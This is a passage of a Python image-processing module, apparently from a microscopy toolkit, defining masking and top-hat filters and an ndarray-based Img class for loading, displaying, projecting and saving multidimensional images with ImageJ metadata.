initial_shiftX=0, initial_shiftY=0, random_start=False): # , dimension_h=-2, dimension_w=-1
if isinstance(img, tuple):
mask = np.zeros(img, dtype=bool) # np.bool is a deprecated alias
else:
mask = np.zeros(img.shape, dtype=bool)
if mask.ndim < 3: # assume no channel so add one
mask = mask[..., np.newaxis]
if spacing_X is not None:
if spacing_X <= 1:
spacing_X = None
if spacing_Y is not None:
if spacing_Y <= 1:
spacing_Y = None
if initial_shiftX == 0 and initial_shiftY == 0 and random_start:
if spacing_X is not None:
initial_shiftX = random.randint(0, spacing_X)
if spacing_Y is not None:
initial_shiftY = random.randint(0, spacing_Y)
# assume all images are with a channel --> probably the best way to do things
for c in range(mask.shape[-1]):
if spacing_Y is not None:
if mask.ndim > 3:
mask[..., initial_shiftY::spacing_Y, :, c] = True
else:
mask[initial_shiftY::spacing_Y, :, c] = True
if spacing_X is not None:
mask[..., initial_shiftX::spacing_X, c] = True
if return_boolean_mask or isinstance(img, tuple):
return mask
if img.ndim < 3: # assume no channel so add one
img = img[..., np.newaxis]
# apply mask to image
img[mask] = masking_value
return img
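# Hedged usage sketch (illustrative values): zero out every second column of an
# hwc image, starting at column 0; NB the input is modified in place and also returned.
# img = mask_rows_or_columns(img, spacing_X=2, spacing_Y=None, masking_value=0)
# passing a shape tuple instead of an array returns only the boolean mask:
# mask = mask_rows_or_columns((128, 128, 1), spacing_X=2)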
# TODO in development --> code that better and check whether it keeps the intensity range or not
def resize(img, new_size, order=1):
from skimage.transform import resize
img = resize(img, new_size, order=1)
return img
# nb there seems to be a bug in white top hat --> infinite loop or bug ???
def __top_hat(image, type='black', structuring_element=square(50), preserve_range=True):
logger.debug('bg subtraction ' + str(type) + '_top_hat')
try:
# TODO crappy bug fix for 3D images in tensorflow --> need some more love
# TODO NB will only work for tensorflow like images or maybe always load and treat images as in tensorflow by adding 1 for channel dimension even if has only one channel?? --> MAY MAKE SENSE
# for some reason top hat does not work with 3D images --> why --> in fact that does work but if image is very noisy and filter is big then it does nothing
if len(image.shape) == 4:
out = np.zeros_like(image) # , dtype=image.dtype
for zpos, zimg in enumerate(image):
for ch in range(zimg.shape[-1]):
out[zpos, ..., ch] = __top_hat_single_channel__(zimg[..., ch], type=type,
structuring_element=structuring_element,
preserve_range=preserve_range)
return out
elif len(image.shape) == 3:
out = np.zeros_like(image) # , dtype=image.dtype
for ch in range(image.shape[-1]):
out[..., ch] = __top_hat_single_channel__(image[..., ch], type=type,
structuring_element=structuring_element,
preserve_range=preserve_range)
return out
elif len(image.shape) == 2:
out = __top_hat_single_channel__(image, type=type, structuring_element=structuring_element,
preserve_range=preserve_range)
return out
else:
print('invalid shape --> ' + type + ' top hat failed, sorry...')
except:
print(str(type) + ' top hat failed, sorry...')
traceback.print_exc()
return image
def black_top_hat(image, structuring_element=square(50), preserve_range=True):
return __top_hat(image, type='black', structuring_element=structuring_element, preserve_range=preserve_range)
def white_top_hat(image, structuring_element=square(50), preserve_range=True):
return __top_hat(image, type='white', structuring_element=structuring_element, preserve_range=preserve_range)
def __top_hat_single_channel__(single_channel_image, type, structuring_element=square(50), preserve_range=True):
dtype = single_channel_image.dtype
min = single_channel_image.min()
max = single_channel_image.max()
if type == 'white':
out = white_tophat(single_channel_image, structuring_element)
else:
out = black_tophat(single_channel_image, structuring_element)
# TODO NB check if correct also
if preserve_range and (out.min() != min or out.max() != max):
out = out / out.max()
out = (out * (max - min)) + min
out = out.astype(dtype)
return out
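# Hedged usage sketch: subtract a smooth bright background from an image;
# disk(25) is an illustrative structuring-element size, not a recommendation.
# cleaned = white_top_hat(img, structuring_element=disk(25))
# dark_spots = black_top_hat(img, structuring_element=square(50))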
class Img(np.ndarray): # subclass ndarray
background_removal = ['No', 'White bg', 'Dark bg']
# see https://en.wikipedia.org/wiki/Feature_scaling
normalization_methods = ['Rescaling (min-max normalization)', 'Standardization (Z-score Normalization)',
'Mean normalization', 'Max normalization (auto)', 'Max normalization (x/255)',
'Max normalization (x/4095)', 'Max normalization (x/65535)',
'Rescaling based on defined lower and upper percentiles',
'None'] # should I add vgg, etc for pretrained encoders ??? maybe put synonyms
normalization_ranges = [[0, 1], [-1, 1]]
clipping_methods = ['ignore outliers', '+', '+/-', '-']
# TODO allow load list of images all specified as strings one by one
# TODO allow virtual stack --> open only one image at a time from a series, can probably do that with text files
def __new__(cls, *args, t=0, d=0, z=0, h=0, y=0, w=0, x=0, c=0, bits=8, serie_to_open=None, dimensions=None,
metadata=None, **kwargs) -> object:
'''Creates a new instance of the Img class
The image class is a numpy ndarray. It is nothing but a matrix of pixel values.
Parameters
----------
t : int
number of time points of the image
d, z : int
number of z stacks of an image
h, y : int
image height
w, x : int
image width
c : int
number of color channels
bits : int
bits per pixel
dimensions : string
order and name of the dimensions of the image
metadata : dict
dict containing metadata entries and their corresponding values
'''
img = None
meta_data = {'dimensions': None, # image dimensions
'bits': None, # bits per pixel
'vx': None, # voxel x size
'vy': None, # voxel y size
'vz': None, # voxel z size
'AR': None, # wh/depth ratio
'LUTs': None, # lut
'cur_d': 0, # current z/depth pos
'cur_t': 0, # current time
'Overlays': None, # IJ overlays
'ROI': None, # IJ ROIs
}
if metadata is not None:
# if user specified some metadata update them
meta_data.update(metadata)
else:
# recover old metadata from original image # is that the correct way
if isinstance(args[0], Img):
try:
meta_data.update(args[0].metadata)
except:
pass
if len(args) == 1:
# case 1: Input array is an already an ndarray
if isinstance(args[0], np.ndarray):
img = np.asarray(args[0]).view(cls)
img.metadata = meta_data
if dimensions is not None:
img.metadata['dimensions'] = dimensions
elif isinstance(args[0], str):
logger.debug('loading ' + str(args[0]))
# print('loading '+str(args[0]))
# input is a string, i.e. a link to one or several files
if '*' not in args[0]:
# single image
meta, img = ImageReader.read(args[0], serie_to_open=serie_to_open)
meta_data.update(meta)
meta_data['path'] = args[0] # add path to metadata
img = np.asarray(img).view(cls)
img.metadata = meta_data
else:
# series of images
image_list = [img for img in glob.glob(args[0])]
image_list = natsorted(image_list)
img = ImageReader.imageread(image_list) # TODO add metadata here too for w,h d and channels
meta_data['path'] = args[0] ## add path to metadata
img = np.asarray(img).view(cls)
img.metadata = meta_data
else:
# custom image creation : setting the dimensions
dims = []
dimensions = []
if t != 0:
dimensions.append('t')
dims.append(t)
if z != 0 or d != 0:
dimensions.append('d')
dims.append(max(z, d))
if h != 0 or y != 0:
dimensions.append('h')
dims.append(max(h, y))
if w != 0 or x != 0:
dimensions.append('w')
dims.append(max(w, x))
if c != 0:
dimensions.append('c')
dims.append(c)
dimensions = ''.join(dimensions)
meta_data['dimensions'] = dimensions # add dimensions to metadata
dtype = np.uint8 # default is 8 bits
if bits == 16:
dtype = np.uint16 # 16 bits
if bits == 32:
dtype = np.float32 # 32 bits
meta_data['bits'] = bits
img = np.asarray(np.zeros(tuple(dims), dtype=dtype)).view(cls)
# array = np.squeeze(array) # TODO may be needed especially if people specify 1 instead of 0 ??? but then need remove some stuff
# img = array
img.metadata = meta_data
if img is None:
# TODO do that better
logger.critical(
"Error, can't open image invalid arguments, file not supported or file does not exist...") # TODO be more precise
return None
return img
# TODO do implement it more wisely or drop it because it's simpler to access the numpy array directly...
def get_pixel(self, *args):
'''get pixel value
TODO
'''
if len(args) == self.ndim:
return self[tuple(args)]
logger.critical('wrong nb of dimensions')
return None
# TODO do implement it more wisely or drop it because it's simpler to access the numpy array directly...
def set_pixel(self, x, y, value):
'''sets pixel value
TODO
'''
# if len(args) == self.ndim:
self[x, y] = value
def get_dimension(self, dim):
'''gets the specified image dimension length
Parameters
----------
dim : single char string
dimension of interest
Returns
-------
int
dimension length
'''
# force dimensions compatibility (e.g. use synonyms)
if dim == 'z':
dim = 'd'
elif dim == 'x':
dim = 'w'
elif dim == 'y':
dim = 'h'
elif dim == 'f':
dim = 't'
if self.metadata['dimensions'] is None:
logger.error('dimension ' + str(dim) + ' not found!!!')
return None
if dim in self.metadata['dimensions']:
idx = self.metadata['dimensions'].index(dim)
idx = idx - len(self.metadata['dimensions'])
if self.ndim >= abs(idx) >= 1:
return self.shape[idx]
else:
logger.error('dimension ' + str(dim) + ' not found!!!')
return None
else:
logger.error('dimension ' + str(dim) + ' not found!!!')
return None
def get_dimensions(self):
'''gets the length of all dimensions
Returns
-------
dict
a dict containing dimension name along with its length
'''
dimension_parameters = {}
for d in self.metadata['dimensions']:
dimension_parameters[d] = self.get_dimension(d)
return dimension_parameters
def get_dim_idx(self, dim):
# force dimensions compatibility (e.g. use synonyms)
if dim == 'z':
dim = 'd'
elif dim == 'x':
dim = 'w'
elif dim == 'y':
dim = 'h'
elif dim == 'f':
dim = 't'
if not dim in self.metadata['dimensions']:
return None
return self.metadata['dimensions'].index(dim)
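# Hedged usage sketch of the dimension accessors (for a custom image, __new__
# builds dimensions in the order t, d, h, w, c):
# img = Img(w=256, h=128, c=3)      # shape (128, 256, 3), dimensions 'hwc'
# img.get_dimension('x')            # 256 ('x' is a synonym for 'w')
# img.get_dimensions()              # {'h': 128, 'w': 256, 'c': 3}
# img.get_dim_idx('c')              # 2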
# TODO code this better
def pop(self, pause=1, lut='gray', interpolation=None, show_axis=False, preserve_AR=True):
'''pops up an image using matplot lib
Parameters
----------
pause : int
time the image should be displayed
interpolation : string or None
interpolation for image display (e.g. 'bicubic', 'nearest', ...)
show_axis : boolean
TODO
preserve_AR : boolean
keep image AR upon display
'''
if self.ndim > 3:
logger.warning("too many dimensions can't pop image")
return
plt.ion()
plt.axis('off')
plt.margins(0)
plt.clf()
plt.axes([0, 0, 1, 1])
ax = plt.gca()
ax.get_xaxis().set_visible(False) # this removes the ticks and numbers for x axis
ax.get_yaxis().set_visible(False)
ax.margins(0)
if self.ndim == 3 and self.shape[2] <= 2:
# create a 3 channel array from the 2 channel array image provided
rgb = np.concatenate(
(self[..., 0, np.newaxis], self[..., 1, np.newaxis], np.zeros_like(self[..., 0, np.newaxis])), axis=-1)
with warnings.catch_warnings():
warnings.simplefilter('ignore')
plt.imshow(img_as_ubyte(rgb), interpolation=interpolation)
# logger.debug("popping image method 1")
else:
if self.ndim == 2:
# if image is single channel display it as gray instead of with a color lut by default
with warnings.catch_warnings():
warnings.simplefilter('ignore')
plt.imshow(img_as_ubyte(self), cmap=lut, interpolation=interpolation) # self.astype(np.uint8)
# logger.debug("popping image method 2")
else:
# split channels if more than 3 channels maybe or remove the alpha channel ??? or not ??? see how to do that
if self.shape[2] == 3:
with warnings.catch_warnings():
warnings.simplefilter('ignore')
plt.imshow(img_as_ubyte(self),
interpolation=interpolation)
# logger.debug("popping image method 3")
else:
for c in range(self.shape[2]):
with warnings.catch_warnings():
warnings.simplefilter('ignore')
plt.imshow(img_as_ubyte(self[:, :, c]), cmap=lut, interpolation=interpolation)
if c != self.shape[2] - 1:
plt.show()
plt.draw()
plt.pause(pause)
# logger.debug("popping image method 4")
if not preserve_AR:
ax.axis('tight') # required to preserve AR but this necessarily adds a bit of white around the image
ax.axis('off')
plt.show()
plt.draw()
plt.pause(pause)
def setBorder(self, distance_from_border_in_px=1, color=0):
''' Set n pixels at the border of the image to the defined color
Parameters
----------
distance_from_border_in_px : int
Distance in pixels from the borders of the image.
color : int or tuple
new color (default is black = 0)
'''
if distance_from_border_in_px <= 0:
# ignore when distance < 0
return
val = color
if self.has_c() and self.get_dimension('c') > 1 and not isinstance(color, tuple):
# convert int color to tuple when tuple is required, i.e. when an img has several channels
val = tuple([color] * self.get_dimension('c'))
all_dims_before_hwc = []
for d in self.metadata['dimensions']: # keep all dimensions before hwc unchanged
if d not in ['w', 'h', 'c', 'x', 'y']:
all_dims_before_hwc.append(slice(None))
# recolor the border
for v in range(distance_from_border_in_px):
all_dims_before_hwc.append(slice(None))
all_dims_before_hwc.append(v)
self[tuple(all_dims_before_hwc)] = val
all_dims_before_hwc = all_dims_before_hwc[:-2]
all_dims_before_hwc.append(v)
all_dims_before_hwc.append(slice(None))
self[tuple(all_dims_before_hwc)] = val
all_dims_before_hwc = all_dims_before_hwc[:-2]
all_dims_before_hwc.append(-(v + 1))
all_dims_before_hwc.append(slice(None))
self[tuple(all_dims_before_hwc)] = val
all_dims_before_hwc = all_dims_before_hwc[:-2]
all_dims_before_hwc.append(slice(None))
all_dims_before_hwc.append(-(v + 1))
self[tuple(all_dims_before_hwc)] = val
all_dims_before_hwc = all_dims_before_hwc[:-2]
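# Hedged usage sketch: blacken a 3-pixel frame around the image, in place;
# for a multi-channel image an int color is broadcast to all channels.
# img.setBorder(distance_from_border_in_px=3, color=0)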
# TODO in fact this is more complex: the channel/color dimension and the time dimension should not be downsampled --> needs more parameters and controls --> quite good already but finalize that later
def downsample(self, dimensions_to_downsample, downsampling_factor=2):
'''Downsamples an image along the specified dimension by the specified factor
Parameters
----------
dimensions_to_downsample : string
chars representing the dimension to downsample
downsampling_factor : int
downsampling factor
Returns
-------
ndarray
a downsampled image
'''
if downsampling_factor == 1:
logger.error("downsampling with a factor = 1 means no downsampling, thereby ignoring...")
return self
if self.metadata['dimensions'] is None:
logger.error("Image dimensions not specified!!!")
return self
idx = None
for dim in self.metadata['dimensions']:
if dim in dimensions_to_downsample:
if idx is None:
idx = np.index_exp[::downsampling_factor]
else:
idx += np.index_exp[::downsampling_factor]
else:
if idx is None:
idx = np.index_exp[:]
else:
idx += np.index_exp[:]
if idx is None:
return self
return self[idx]
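# Hedged usage sketch: keep every second pixel along h and w (pure strided
# slicing, no interpolation or anti-aliasing).
# small = img.downsample('hw', downsampling_factor=2)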
def rescale(self, factor=2):
'''rescales an image (using skimage)
Parameters
----------
factor : int
rescaling factor
Returns
-------
ndarray
a rescaled image
'''
return skimage.transform.rescale(self, 1. / factor, preserve_range=True, anti_aliasing=False, multichannel=True)
# ideally should make it return an image but maybe too complicated --> ok for now let's wait for my python skills to improve
def convolve(self, kernel=np.array([[-1, -1, -1],
[-1, 8, -1],
[-1, -1, -1]])):
'''convolves an image (using scipy)
Parameters
----------
kernel : np.array
a convolution kernel
Returns
-------
ndarray
a convolved image
'''
convolved = scipy.signal.convolve2d(self, kernel, 'valid')
return convolved
def has_dimension(self, dim):
'''Returns True if image has the specified dimension, False otherwise
Parameters
----------
dim : single char string
dimension of interest
Returns
-------
boolean
True if dimension of interest exist in image
'''
# use dimension synonyms
if dim == 'x':
dim = 'w'
if dim == 'y':
dim = 'h'
if dim == 'z':
dim = 'd'
if dim in self.metadata['dimensions']:
return True
return False
def is_stack(self):
'''returns True if image has a z/d dimension, False otherwise
'''
return self.has_d()
def has_channels(self):
'''returns True if image has a c dimension, False otherwise
'''
return self.has_c()
def get_t(self, t):
'''returns an image at time t, None otherwise
Parameters
----------
t : int
time point of interest
Returns
-------
ndarray
image at time t or None
'''
if not self.is_time_series():
return None
if t < self.get_dimension('t'): # TODO check code
return self.imCopy(t=t)
return None
# set the current time frame
def set_t(self, t):
self.metadata['cur_t'] = t
def get_d_scaling(self):
'''gets the z/d scaling factor for the current image
Returns
-------
float
the depth scaling factor
'''
# NB z_scale only exists once set_d_scaling has been called
return self.z_scale
def set_d_scaling(self, scaling_factor):
'''sets the z/d scaling factor for the current image
Parameters
----------
scaling_factor : float
the new image scaling factor
'''
self.z_scale = scaling_factor
def has_t(self):
'''returns True if the image is a time series, False otherwise
'''
return self.has_dimension('t')
def is_time_series(self):
'''returns True if the image is a time series, False otherwise
'''
return self.has_t()
def has_d(self):
'''returns True if the image is a Z-stack, False otherwise
'''
return self.has_dimension('d') or self.has_dimension('z')
# NB this redefinition overrides the synonym-aware has_dimension above
def has_dimension(self, d):
'''returns True if the image has the specified dimension, False otherwise
Parameters
----------
dim : single char string
dimension of interest
Returns
-------
boolean
True if dim exists
'''
return d in self.metadata['dimensions']
# check for the presence of LUTs
def has_LUTs(self):
return 'LUTs' in self.metadata and self.metadata['LUTs'] is not None
# get LUTs
def get_LUTs(self):
if 'LUTs' in self.metadata:
return self.metadata['LUTs']
return None
# set LUTs
def set_LUTs(self, LUTs):
self.metadata['LUTs'] = LUTs
def has_c(self):
'''returns True if the image has color channels, False otherwise
'''
return 'c' in self.metadata['dimensions']
def _create_dir(self, output_name):
# create dir if does not exist
if output_name is None:
return
output_folder, filename = os.path.split(output_name)
# bug fix in case just a filename and no parent folder
if output_folder:
os.makedirs(output_folder, exist_ok=True)
@staticmethod
def img2Base64(img):
# save it as png and encode it
if img is not None:
# assume image
buf = io.BytesIO()
im = Image.fromarray(img)
im.save(buf, format='png')
buf.seek(0) # rewind file
figdata_png = base64.b64encode(buf.getvalue()).decode("utf-8")
buf.close()
return figdata_png
else:
# assume pyplot image then
print('Please call this before plt.show() to avoid getting a blank output')
buf = io.BytesIO()
plt.savefig(buf, format='png', bbox_inches='tight') # TO REMOVE UNNECESSARY WHITE SPACE AROUND GRAPH...
buf.seek(0) # rewind file
figdata_png = base64.b64encode(buf.getvalue()).decode("utf-8")
buf.close()
return figdata_png
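# Hedged usage sketch (assumes a PIL-compatible uint8 array): the returned
# string can be embedded directly in an HTML <img> tag.
# b64 = Img.img2Base64(my_uint8_array)
# html = '<img src="data:image/png;base64,' + b64 + '"/>'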
# mode can be IJ or raw --> if raw --> set IJ to false and save directly TODO clean the mode and mode is only for tif so far --> find a way to make it better and more optimal --> check also how mode would behave with z stacks, etc...
def save(self, output_name, print_file_name=False, ijmetadata='copy', mode='IJ'):
'''saves the current image
Parameters
----------
output_name : string
name of the file to save
'''
if print_file_name:
print('saving', output_name)
if output_name is None:
logger.error("No output name specified... ignoring...")
return
# TODO maybe handle tif with stars in their name here to avoid loss of data but ok for now...
if not '*' in output_name and (output_name.lower().endswith('.tif') or output_name.lower().endswith('.tiff')):
self._create_dir(output_name)
if mode != 'IJ': # TODO maybe do a TA mode or alike instead...
out = self
tifffile.imwrite(output_name, out)
else:
# create dir if does not exist
out = self
# apparently int type is not supported by IJ
if out.dtype == np.int32:
out = out.astype(np.float32) # TODO check if correct with real image but should be
if out.dtype == np.int64:
out = out.astype(np.float64) # TODO check if correct with real image but should be
# IJ does not support bool type too
if out.dtype == bool: # np.bool is a deprecated alias
out = out.astype(np.uint8) * 255
if out.dtype == np.double:
out = out.astype(np.float32)
# if self.has_c():
# if not self.has_d() and self.has_t():
# out = np.expand_dims(out, axis=-1)
# out = np.moveaxis(out, -1, 1)
# out = np.moveaxis(out, -1, -3)
# tifffile.imwrite(output_name, out, imagej=True) # make the data compatible with IJ
# else:
# # most likely a big bug here --> fix it --> if has d and no t does it create a bug ???? --> maybe
# if not self.has_d() and self.has_t():
# out = np.expand_dims(out, axis=-1)
# out = np.moveaxis(out, -1, 1)
# out = np.expand_dims(out, axis=-1)
# # reorder dimensions in the IJ order
# out = np.moveaxis(out, -1, -3)
# tifffile.imwrite(output_name, out, imagej=True) # this is the way to get the data compatible with IJ
# should work better now and fix several issues... but need test it with real images
# if image has no c --> assume all ok
if self.metadata['dimensions'] is not None:
# print('in dims')
# print(self.has_c()) # why has no c channel ???
if not self.has_c():
out = out[..., np.newaxis]
if not self.has_d():
out = out[np.newaxis, ...]
if not self.has_t():
out = out[np.newaxis, ...]
else:
# print('othyer')
# no dimension specified --> assume always the same order that is tzyxc --> TODO maybe ...tzyxc
if out.ndim < 3:
out = out[..., np.newaxis]
if out.ndim < 4:
out = out[np.newaxis, ...]
if out.ndim < 5:
out = out[np.newaxis, ...]
# print('final', out.shape)
out = np.moveaxis(out, -1, -3) # need move c channel before hw (because it is default IJ style)
# TODO maybe offer compression at some point to gain space ???
# imageJ order is TZCYXS order with dtype is uint8, uint16, or float32. Is S a LUT ???? probably yes because (S=3 or S=4) must be uint8. can I use compression with ImageJ's Bio-Formats import function.
# TODO add the possibility to save ROIs if needed...
# Parameters 'append', 'byteorder', 'bigtiff', and 'imagej', are passed # to TiffWriter(). Other parameters are passed to TiffWriter.save().
# print(ijmetadata)
rois = {}
if ijmetadata == 'copy' and self.metadata['Overlays']:
rois['Overlays'] = self.metadata['Overlays']
if ijmetadata == 'copy' and self.metadata['ROI']:
rois['ROI'] = self.metadata['ROI']
if not rois:
rois = None
# quick hack to force images to display as composite in IJ if they have channels -> probably needs be improved at some point
# try:
tifffile.imwrite(output_name, out, imagej=True, ijmetadata=rois,
metadata={'mode': 'composite'} if self.metadata[
'dimensions'] is not None and self.has_c() else {}) # small hack to keep only non RGB images as composite and self.get_dimension('c')!=3
# TODO at some point handle support for RGB 24-32 bits images saving as IJ compatible but skip for now
# nb tifffile.imwrite(os.path.join(filename0_without_ext,'tra_test_saving_24bits_0.tif'), tracked_cells_t0, imagej=True, metadata={}) --> saves as RGB if image RGB 3 channels
# TODO --> some day do the saving smartly with the dimensions included see https://pypi.org/project/tifffile/
# imwrite('temp.tif', data, bigtiff=True, photometric='minisblack', compression = 'deflate', planarconfig = 'separate', tile = (32, 32), metadata = {'axes': 'TZCYX'})
# imwrite('temp.tif', volume, imagej=True, resolution=(1. / 2.6755, 1. / 2.6755), metadata = {'spacing': 3.947368, 'unit': 'um', 'axes': 'ZYX'})
else:
if output_name.lower().endswith('.npy') or output_name.lower().endswith('.epyseg'):
# directly save as .npy --> the numpy default array format
self._create_dir(output_name)
np.save(output_name, self,
allow_pickle=False) # set allow_pickle=False to avoid problems, as pickle is by definition not stable
if self.metadata is not None and 'times' in self.metadata.keys():
times = self.metadata['times']
# force serialisation of times
self.metadata['times'] = str(times)
with open(output_name + '.meta', 'w') as outfile:
json.dump(self.metadata, outfile)
# restore time metadata
self.metadata['times'] = times
# print('exporting metadata', self.metadata) # metadata is not set --> too bad --> why
# np.savez_compressed(output_name, self ) allow_pickle=False {'allow_pickle':False} --> maybe pass that
return
# the huge problem with this is that it is not portable --> because it necessarily uses pickle --> a very dangerous save, and too bad because it would allow saving metadata easily if passed as an array...
if output_name.lower().endswith('.npz'):
# save as .npz --> the compressed numpy archive format
self._create_dir(output_name)
# VERY GOOD IDEA TODO data is saved as data.npy inside the npz --> could therefore also save metadata ... --> VERY GOOD IDEA
np.savez_compressed(output_name,
data=self) # the data is stored as data.npy inside the npz archive
return
if not '*' in output_name and (self.has_t() or self.has_d()):
logger.warning(
"image is a stack and cannot be saved as a single image; use a generic name like /path/to/img*.png instead")
return
else:
self._create_dir(output_name)
if not self.has_t() and not self.has_d():
new_im = Image.fromarray(self)
new_im.save(output_name)
self.save_IJ_ROIs_or_overlays(output_name)
# try save IJ ROIs and overlays if they exist
else:
# TODO recode below to allow any number of dimensions
if self.has_t():
t_counter = 0
# loop over all times of the image
for t in self[:]:
z_counter = 0
# loop over all z of the image
for z in t[:]:
if z.ndim == 3 and z.shape[2] <= 2:
# create a 3 channel array from the 2 channel array image provided
z = np.concatenate((z[..., 0, np.newaxis], z[..., 1, np.newaxis],
np.zeros_like(z[..., 0, np.newaxis])), axis=-1)
with warnings.catch_warnings(): # force it to be 8 bits for these formats
warnings.simplefilter('ignore')
z = img_as_ubyte(z)
new_im = Image.fromarray(z)
new_im.save(output_name.replace('*', 't{:03d}_z{:04d}'.format(t_counter,
z_counter))) # replace * by tover 3 digit and z over 4 digits
z_counter += 1
t_counter += 1
self.save_IJ_ROIs_or_overlays(output_name)
elif self.has_d():
# loop over all z of the image
z_counter = 0
for z in self[:]:
if z.ndim == 3 and z.shape[2] <= 2:
# create a 3 channel array from the 2 channel array image provided
z = np.concatenate((z[..., 0, np.newaxis], z[..., 1, np.newaxis],
np.zeros_like(z[..., 0, np.newaxis])), axis=-1)
with warnings.catch_warnings(): # force it 8 bits for these rough formats
warnings.simplefilter('ignore')
z = img_as_ubyte(z)
new_im = Image.fromarray(z)
new_im.save(
output_name.replace('*', 'z{:04d}'.format(z_counter))) # replace * by z over 4 digits
z_counter += 1
self.save_IJ_ROIs_or_overlays(output_name)
# returns IJ ROIs from metadata
def get_IJ_ROIs(self):
try:
# trying to save ROIs from ij images
from roifile import ImagejRoi
rois = []
if self.metadata['Overlays'] is not None:
overlays = self.metadata['Overlays']
if isinstance(overlays, list):
if overlays:
overlays = [ImagejRoi.frombytes(roi) for roi in overlays]
rois.extend(overlays)
else:
overlays = ImagejRoi.frombytes(overlays)
rois.append(overlays)
if self.metadata['ROI'] is not None:
rois_ = self.metadata['ROI']
print(len(rois_), rois_)
if isinstance(rois_, list):
if rois_:
rois_ = [ImagejRoi.frombytes(roi) for roi in rois_]
rois.extend(rois_)
else:
rois_ = ImagejRoi.frombytes(rois_)
rois.append(rois_)
if not rois:
return None
return rois
except:
# no big deal if it fails --> just print error for now
traceback.print_exc()
# maybe do an IJ ROI editor some day ????
# saves IJ ROIs as a .roi file or .zip file
def save_IJ_ROIs_or_overlays(self, filename):
try:
# trying to save ROIs from ij images
rois = self.get_IJ_ROIs()
if not rois:
return
output_filename = filename
if len(rois) > 1:
# delete file if exists
output_filename += '.zip'
if os.path.exists(output_filename):
os.remove(output_filename)
else:
output_filename += '.roi'
if rois is not None and rois:
for roi in rois:
roi.tofile(output_filename)
except:
# no big deal if it fails --> just print error for now
traceback.print_exc()
def get_width(self):
return self.get_dimension('w')
def get_height(self):
return self.get_dimension('h')
def projection(self, type='max'):
'''creates projection
TODO add more proj
Parameters
----------
type : string
projection type
'''
# TODO implement that more wisely asking just which dimension should be projected and projection type
proj_dimensions = []
if self.has_t():
proj_dimensions.append(self.get_dimension('t'))
proj_dimensions.append(self.get_height())
proj_dimensions.append(self.get_width())
if self.has_c():
proj_dimensions.append(self.get_dimension('c'))
projection = np.zeros(tuple(proj_dimensions), dtype=self.dtype)
if type == 'max':
if self.has_t():
# do proj for each channel
if self.has_c():
for t in range(self.shape[0]):
if self.has_d():
for z in self[t][:]:
for i in range(z.shape[-1]):
projection[t, ..., i] = np.maximum(projection[t, ..., i], z[..., i])
# print(projection.shape)
return Img(projection, dimensions='thwc')
else:
for t in range(self.shape[0]):
if self.has_d():
for z in self[t]:
projection[t] = np.maximum(projection[t], z)
return Img(projection, dimensions='thw')
elif self.has_c():
if self.has_d():
for z in self[:]:
for i in range(z.shape[-1]):
projection[..., i] = np.maximum(projection[..., i], z[..., i])
return Img(projection, dimensions='hwc')
else:
if self.has_d():
for z in self[:]:
projection = np.maximum(projection, z)
return Img(projection, dimensions='hw')
else:
logger.critical("projection type " + type + " not supported yet")
return None
return self
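# Hedged usage sketch: maximum-intensity projection of a z-stack along d; the
# returned Img keeps the remaining dimensions (e.g. 'hwc' for a 'dhwc' stack).
# mip = stack.projection(type='max')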
# TODO DANGER!!!! OVERRIDING __str__ CAUSES HUGE TROUBLE BUT NO CLUE WHY
# --> this messes the whole class and the slicing of the array --> DO NOT PUT IT BACK --> NO CLUE WHY THOUGH
# def __str__(self):
def to_string(self):
'''A string representation of this image
'''
description = '#' * 20
description += '\n'
description += 'Image:'
description += '\n'
description += 'vx=' + str(self.metadata['vx']) + ' vy=' + str(self.metadata['vy']) + ' vz=' + str(
self.metadata['vz'])
description += '\n'
description += 'dimensions=' + self.metadata['dimensions']
description += '\n'
description += 'shape=' + str(self.shape)
description += '\n'
description += self.metadata.__str__()
description += '\n'
dimensions_sizes = self.get_dimensions()
for k, v in dimensions_sizes.items():
description += k + '=' + str(v) + ' '
description += '\n'
description += str(super.__str__(self))
description += '\n'
description += '#' * 20
return description
# below assumes channels last
@staticmethod
def BGR_to_RGB(bgr):
return bgr[..., ::-1]
@staticmethod
def RGB_to_BGR(rgb):
return rgb[..., ::-1]
@staticmethod
def RGB_to_GBR(rgb):
return rgb[..., [2, 0, 1]]
@staticmethod
def RGB_to_GRB(rgb):
return rgb[..., [1, 0, 2]]
@staticmethod
def RGB_to_RBG(rgb):
return rgb[..., [0, 2, 1]]
@staticmethod
def RGB_to_BRG(rgb):
return rgb[..., [2, 0, 1]]
# TODO code that better
def getQimage(self):
'''get a qimage from ndarray
Returns
-------
qimage
a pyqt compatible image
'''
logger.debug('Creating a qimage from a numpy image')
img = self
dims = []
for d in self.metadata['dimensions']:
if d in ['w', 'h', 'c', 'x', 'y']:
dims.append(slice(None))
else:
dims.append(0)
img = img[tuple(dims)]
img = np.ndarray.copy(img) # need copy the array
if img.dtype != np.uint8:
# just to remove the warning raised by img_as_ubyte
with warnings.catch_warnings():
warnings.simplefilter('ignore')
try:
# need manual conversion of the image so that it can be read as 8 bit or alike
# force image between 0 and 1 then do convert
img = img_as_ubyte((img - img.min()) / (img.max() - img.min()))
except:
print('error converting image to 8 bits')
return None
bytesPerLine = img.strides[0]
if self.has_c() and self.get_dimension('c') is not None and self.get_dimension('c') != 0:
nb_channels = self.get_dimension('c')
logger.debug('Image has ' + str(nb_channels) + ' channels')
if nb_channels == 3:
qimage = QImage(img.data, self.get_width(), self.get_height(), bytesPerLine,
QImage.Format_RGB888)
elif nb_channels < 3:
# add n dimensions
bgra = np.zeros((self.get_height(), self.get_width(), 3), np.uint8, 'C')
if img.shape[2] >= 1:
bgra[..., 0] = img[..., 0]
if img.shape[2] >= 2:
bgra[..., 1] = img[..., 1]
if img.shape[2] >= 3:
bgra[..., 2] = img[..., 2]
qimage = QImage(bgra.data, self.get_width(), self.get_height(), bgra.strides[0], QImage.Format_RGB888)
else:
if nb_channels == 4:
bgra = np.zeros((self.get_height(), self.get_width(), 4), np.uint8, 'C')
bgra[..., 0] = img[..., 0]
bgra[..., 1] = img[..., 1]
bgra[..., 2] = img[..., 2]
if img.shape[2] >= 4:
logger.debug('using 4th numpy color channel as alpha for qimage')
bgra[..., 3] = img[..., 3]
else:
bgra[..., 3].fill(255)
qimage = QImage(bgra.data, self.get_width(), self.get_height(), bgra.strides[0],
QImage.Format_ARGB32)
else:
# TODO
logger.error("not implemented yet!!!!, too many channels")
else:
qimage = QImage(img.data, self.get_width(), self.get_height(), bytesPerLine,
QImage.Format_Indexed8)
# required to allow creation of a qicon --> need keep
for i in range(256):
qimage.setColor(i, QColor(i, i, i).rgb())
return qimage
@staticmethod
def interpolation_free_rotation(img, angle=90):
'''performs a rotation that does not require interpolation
